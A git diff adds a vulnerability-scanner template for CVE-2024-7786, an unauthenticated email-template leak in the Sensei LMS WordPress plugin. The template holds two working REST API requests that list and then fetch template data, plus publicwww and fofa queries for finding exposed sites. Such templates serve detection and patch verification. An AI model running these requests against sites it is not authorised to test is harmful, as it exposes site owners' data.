diff --git a/http/cves/2024/CVE-2024-7786.yaml b/http/cves/2024/CVE-2024-7786.yaml new file mode 100755 index 0000000000..0a3bacd01c --- /dev/null +++ b/http/cves/2024/CVE-2024-7786.yaml @@ -0,0 +1,75 @@ +id: CVE-2024-7786 + +info: + name: Sensei LMS < 4.24.2 - Email Template Leak + author: s4e-io + severity: high + description: | + The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates. + reference: + - https://wpscan.com/vulnerability/f44e6f8f-3ef2-45c9-ae9c-9403305a548a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-7786 + - https://www.usom.gov.tr/bildirim/tr-24-1387 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-7786 + epss-score: 0.00043 + epss-percentile: 0.09568 + metadata: + max-request: 2 + verified: true + vendor: automattic + product: sensei-lms + framework: wordpress + publicwww-query: "/wp-content/plugins/sensei-lms" + fofa-query: body="/wp-content/plugins/sensei-lms" + tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"id","date_gmt","slug")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + internal: true + + extractors: + - type: json + part: body + name: template_id + json: + - '.[0].id' + internal: true + + - raw: + - | + GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'sensei_email_preview_id={{template_id}}' + - 'media?parent={{template_id}}' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200